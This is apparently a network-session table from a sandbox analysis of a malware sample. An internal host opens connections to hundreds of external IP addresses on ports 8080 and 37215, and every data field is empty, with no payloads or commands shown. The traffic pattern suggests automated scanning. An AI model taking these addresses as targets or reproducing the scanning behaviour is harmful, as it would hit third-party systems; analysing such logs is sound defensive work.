                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21819192.168.2.2351408168.218.24.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21820192.168.2.2360676147.127.159.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21821192.168.2.234393248.122.209.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21822192.168.2.2341906202.148.53.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21823192.168.2.2344640113.249.69.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21824192.168.2.2358500165.142.152.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21825192.168.2.234037280.130.227.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21826192.168.2.2354398210.9.119.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21827192.168.2.2341256205.139.46.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21828192.168.2.2334352213.224.155.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21829192.168.2.234952881.205.51.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21830192.168.2.2339788113.34.114.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21831192.168.2.235416273.206.251.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21832192.168.2.2348100174.98.235.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21833192.168.2.23376068.149.132.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21834192.168.2.234244646.191.26.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21835192.168.2.235000690.118.154.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21836192.168.2.236034445.98.131.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21837192.168.2.2346646222.52.0.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21838192.168.2.233324695.45.23.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21839192.168.2.233974675.234.104.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21840192.168.2.2337182170.105.220.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21841192.168.2.235857846.212.125.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21842192.168.2.235989267.84.144.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21843192.168.2.233637641.130.35.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21844192.168.2.2353686187.255.146.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21845192.168.2.2350480198.52.249.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21846192.168.2.235927453.116.38.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21847192.168.2.235232889.53.29.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21848192.168.2.235813089.198.239.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21849192.168.2.234066869.196.50.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21850192.168.2.2333566134.45.252.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21851192.168.2.233795636.71.78.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21852192.168.2.2337252196.211.158.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21853192.168.2.23544468.153.126.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21854192.168.2.234983289.122.23.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21855192.168.2.2341906192.176.41.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21856192.168.2.234636886.4.32.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21857192.168.2.233324832.2.224.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21858192.168.2.2359204164.4.67.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21859192.168.2.2348286183.164.182.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21860192.168.2.233684081.198.239.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21861192.168.2.2335022108.231.149.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21862192.168.2.2360414155.60.40.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21863192.168.2.2341136202.64.217.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21864192.168.2.2343518143.41.180.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21865192.168.2.2341138191.49.62.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21866192.168.2.2355950140.206.125.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21867192.168.2.2359058165.221.232.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21868192.168.2.2342562197.4.57.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21869192.168.2.2344804122.79.101.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21870192.168.2.2335058197.204.118.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21871192.168.2.2359126197.226.155.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21872192.168.2.2353264197.78.134.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21873192.168.2.2335454197.26.59.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21874192.168.2.2334740157.79.124.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21875192.168.2.233292641.14.189.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21876192.168.2.2356478186.117.135.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21877192.168.2.234916441.71.109.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21878192.168.2.2348898157.169.40.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21879192.168.2.2333818197.39.224.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21880192.168.2.235819841.214.2.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21881192.168.2.23434468.30.171.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21882192.168.2.2337770157.1.82.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21883192.168.2.2357626157.79.192.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21884192.168.2.235718284.247.10.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21885192.168.2.2341386157.67.13.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21886192.168.2.2350878157.93.139.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21887192.168.2.234582041.87.131.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21888192.168.2.2339374197.252.219.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21889192.168.2.235000441.231.27.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21890192.168.2.234779441.230.12.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21891192.168.2.2335342157.104.214.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21892192.168.2.233587041.197.46.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21893192.168.2.233770041.131.240.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21894192.168.2.2344610157.155.226.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21895192.168.2.2342476157.30.49.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21896192.168.2.235795041.35.92.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21897192.168.2.2352848157.168.43.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21898192.168.2.2342800111.45.132.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21899192.168.2.2343980157.71.58.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21900192.168.2.233542841.218.59.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21901192.168.2.2341090157.24.89.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21902192.168.2.2348474157.14.158.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21903192.168.2.2354986126.156.108.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21904192.168.2.2355152157.158.191.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21905192.168.2.2334840157.76.35.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21906192.168.2.2352938157.182.111.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21907192.168.2.235011641.249.229.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21908192.168.2.2355456157.92.148.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21909192.168.2.234561869.237.0.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21910192.168.2.2343106197.218.15.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21911192.168.2.2355112157.47.59.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21912192.168.2.2348630157.145.207.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21913192.168.2.2358846182.126.76.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21914192.168.2.233855441.106.128.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21915192.168.2.234886241.157.181.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21916192.168.2.2348002197.251.227.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21917192.168.2.2338642197.73.233.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21918192.168.2.2356182197.198.167.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21919192.168.2.233881224.188.139.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21920192.168.2.2355830157.19.201.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21921192.168.2.2338956157.37.61.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21922192.168.2.233824481.189.48.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21923192.168.2.233298041.53.217.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21924192.168.2.2347156197.35.175.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21925192.168.2.2343430133.25.117.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21926192.168.2.2352460197.142.205.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21927192.168.2.2351696157.198.178.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21928192.168.2.2336180197.226.11.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21929192.168.2.234705441.110.114.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21930192.168.2.235596641.103.198.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21931192.168.2.2337060191.164.160.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21932192.168.2.2357254125.51.133.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21933192.168.2.235343841.237.187.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21934192.168.2.235884841.64.59.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21935192.168.2.2348442197.184.25.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21936192.168.2.2342788197.151.3.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21937192.168.2.2340202197.197.247.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21938192.168.2.233699018.202.81.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21939192.168.2.2342952197.236.225.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21940192.168.2.235713641.81.13.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21941192.168.2.235794641.227.170.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21942192.168.2.2340112197.101.51.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21943192.168.2.234695081.244.11.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21944192.168.2.2358902197.238.166.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21945192.168.2.2335286197.201.77.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21946192.168.2.235938441.229.1.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21947192.168.2.2339738197.56.123.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21948192.168.2.233360293.63.112.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21949192.168.2.2345696197.65.122.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21950192.168.2.235200441.50.167.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21951192.168.2.2352108157.182.222.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21952192.168.2.233648686.6.220.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21953192.168.2.234894241.245.253.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21954192.168.2.2341224197.231.19.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21955192.168.2.2340816157.136.16.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21956192.168.2.2353302197.19.39.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21957192.168.2.2346118106.190.80.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21958192.168.2.2351480197.142.158.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21959192.168.2.2347844197.116.222.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21960192.168.2.2347068197.90.131.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21961192.168.2.2346772197.245.70.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21962192.168.2.235568441.204.26.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21963192.168.2.2346190217.144.151.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21964192.168.2.2338396197.130.5.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21965192.168.2.2343318213.163.160.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21966192.168.2.235240841.14.34.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21967192.168.2.2355426197.152.31.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21968192.168.2.2347338150.99.21.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21969192.168.2.2337678197.87.242.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21970192.168.2.2360628197.87.46.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21971192.168.2.233921093.135.35.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21972192.168.2.2345378132.249.92.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21973192.168.2.233491441.123.20.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21974192.168.2.2333158157.89.133.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21975192.168.2.233990841.201.15.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21976192.168.2.2339744197.88.192.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21977192.168.2.2333220197.37.24.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21978192.168.2.2339986157.170.148.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21979192.168.2.2335290157.141.43.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21980192.168.2.2360488197.143.158.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21981192.168.2.2334050197.103.57.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21982192.168.2.234867841.137.105.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21983192.168.2.2337054107.128.83.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21984192.168.2.2348746197.63.102.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21985192.168.2.2360878157.53.239.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21986192.168.2.234056641.147.204.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21987192.168.2.2351364197.217.209.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21988192.168.2.2347482157.218.242.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21989192.168.2.2335306197.8.10.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21990192.168.2.2359846157.235.0.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21991192.168.2.2338780170.182.184.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21992192.168.2.2346738177.228.247.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21993192.168.2.233564841.102.218.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21994192.168.2.2333638200.192.251.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21995192.168.2.2345010166.216.162.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21996192.168.2.235421841.207.61.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21997192.168.2.2336612115.40.68.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21998192.168.2.2336082182.144.17.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21999192.168.2.2332930197.244.135.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22000192.168.2.2349050197.37.104.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22001192.168.2.234269641.101.216.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22002192.168.2.2357524157.8.100.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22003192.168.2.235922241.152.188.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22004192.168.2.2341886197.54.86.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22005192.168.2.233488013.64.41.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22006192.168.2.2349472197.84.100.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22007192.168.2.234113641.211.193.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22008192.168.2.235574441.122.137.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22009192.168.2.233355441.16.207.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22010192.168.2.236058019.170.105.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22011192.168.2.235833441.4.84.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22012192.168.2.235442241.43.74.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22013192.168.2.2347492197.226.102.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22014192.168.2.2344256157.104.161.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22015192.168.2.235908449.106.0.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22016192.168.2.2345846197.104.27.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22017192.168.2.235775441.154.240.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22018192.168.2.2354732141.200.53.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22019192.168.2.2345262109.46.196.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22020192.168.2.233672068.50.219.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22021192.168.2.234333834.132.127.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22022192.168.2.233884267.194.232.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22023192.168.2.2342698178.78.213.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22024192.168.2.2354424182.169.20.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22025192.168.2.233496224.155.150.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22026192.168.2.235146896.21.107.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22027192.168.2.2356082124.41.147.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22028192.168.2.2353820106.30.213.318080
